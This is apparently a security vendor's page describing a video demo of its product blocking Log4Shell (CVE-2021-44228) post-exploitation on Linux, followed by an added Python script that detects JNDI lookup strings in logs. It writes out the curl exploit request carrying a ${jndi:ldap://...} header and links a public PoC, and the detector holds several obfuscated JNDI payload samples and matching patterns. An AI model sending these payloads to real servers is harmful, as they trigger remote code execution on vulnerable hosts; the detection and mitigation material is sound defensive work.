SentinelOne vs Apache Log4j2 (CVE-2021-44228) – Linux – Detection, Prevention & Mitigation
December 12, 2021
Watch SentinelOne block the post-exploitation attempts that follow a Log4j2 (CVE-2021-44228) exploit. In this Linux demo we used a publicly available PoC with a weaponized malicious script as the post-exploitation payload. Read more on our blog to learn more and stay protected:
https://www.sentinelone.com/blog/cve-2021-44228-staying-secure-apache-log4j-vulnerability/
Exploit attempts observed in the wild so far have delivered commodity cryptominer payloads or other well-known, commodity post-exploitation tooling. SentinelOne expects further opportunistic abuse by a wide variety of attackers, including ransomware and nation-state actors.
Potential attack vectors covered by the Singularity XDR platform include post-exploitation frameworks such as Cobalt Strike, Empire and Metasploit, the use of post-exploitation tools such as Mimikatz and BloodHound, and ransomware and cryptominer activity.
PoC Reference: https://archive.org/details/github.com-tangxiaofeng7-CVE-2021-44228-Apache-Log4j-Rce_-_2021-12-11_07-40-15
The PoC used in the SentinelOne video is based on the PoC above. The same code can be used to execute a variety of payloads on the targeted endpoint; in this case we used a malicious PowerShell script launched via a .bat file.
The public tangxiaofeng7 proof-of-concept code stages the malicious LDAP server and answers the target's JNDI queries.
The exploit is delivered to the target host via curl:
curl 192.168.xxx.xxx:8080 -H 'X-Api-Version: ${jndi:ldap://192.168.xxx.xxx:1389/STRING}'
The JNDI lookup string is carried in the X-Api-Version header. When the vulnerable application logs that header value, Log4j resolves the ${jndi:ldap://...} lookup, the target host reaches out to the attacker's LDAP server, and the attacker's staged code is executed (in the case of this demo, explorer.exe c:\temp\run.bat).
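The request above is also what a defender should be looking for in access logs and captured headers. As an added example (not SentinelOne's code and not part of the PoC), the following Python detector flags the plain ${jndi:...} form used in the demo as well as the nested ${lower:...}, ${upper:...} and ${...:-x} obfuscations and URL encoding that Log4j 2 resolves before the lookup runs. The sample log lines, header names and IP addresses are constructed for the example.

```python
"""Flag Log4Shell (CVE-2021-44228) JNDI lookup strings in HTTP log lines.

Added example, not SentinelOne's or the PoC author's code. Log4j 2 resolves
nested lookups inside-out before it performs the outer ${jndi:...} lookup,
so the detector normalizes the same way: it repeatedly collapses
${lower:x} / ${upper:x} and ${prefix:-default} (including the empty-prefix
${::-x} form) until the string stops changing, then matches the lookup.
"""
import re
from urllib.parse import unquote

# Constructed sample lines. Indexes 0-4 are malicious (0 mirrors the curl
# command from the demo), 5-6 are benign.
SAMPLE_LINES = [
    "GET / HTTP/1.1 X-Api-Version: ${jndi:ldap://192.168.0.10:1389/STRING}",
    "User-Agent: ${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://10.0.0.5:1389/a}",
    "Referer: ${${::-j}${::-n}${::-d}${::-i}:rmi://10.0.0.5:1099/obj}",
    "X-Forwarded-For: ${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap://10.0.0.5:1389/x}",
    "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F10.0.0.5%3A1389%2Fq%7D HTTP/1.1",
    "GET /index.html HTTP/1.1 User-Agent: Mozilla/5.0",
    "price=${total} shown to user",  # ${...} syntax, but not a JNDI lookup
]

# ${lower:x} or ${upper:x} with no further nesting inside -> x, case-folded.
_CASE_RE = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
# ${anything:-default} with no further nesting inside -> default.
# Covers ${::-j}, ${env:NOPE:-j}, ${sys:NOPE:-j}, ${date:':'} style tricks.
_DEFAULT_RE = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")
# The lookup itself, matched only after normalization.
_JNDI_RE = re.compile(
    r"\$\{\s*jndi\s*:\s*(ldap|ldaps|rmi|dns|iiop|corba|nds|http)\s*:",
    re.IGNORECASE,
)


def _fold_case(m: re.Match) -> str:
    return m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper()


def normalize(line: str, max_rounds: int = 10) -> str:
    """URL-decode, then resolve nested lookups inside-out until stable."""
    s = unquote(line)
    for _ in range(max_rounds):
        new = _CASE_RE.sub(_fold_case, s)
        new = _DEFAULT_RE.sub(lambda m: m.group(1), new)
        if new == s:
            break
        s = new
    return s


def is_jndi_lookup(line: str) -> bool:
    """True if the line contains a JNDI lookup after de-obfuscation."""
    return _JNDI_RE.search(normalize(line)) is not None


def scan(lines):
    """Return (index, normalized_line) for every line that carries a lookup."""
    return [(i, normalize(l)) for i, l in enumerate(lines) if is_jndi_lookup(l)]


if __name__ == "__main__":
    for idx, shown in scan(SAMPLE_LINES):
        print(f"line {idx}: {shown}")
```

Run it against a web server access log or a proxy's captured request headers. Matching log text is a detection aid only: it misses payloads in fields the application never logs, and it does not replace removing the vulnerable lookup by upgrading Log4j.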
Watch our Windows demo here: https://youtu.be/z5knUL9rT0U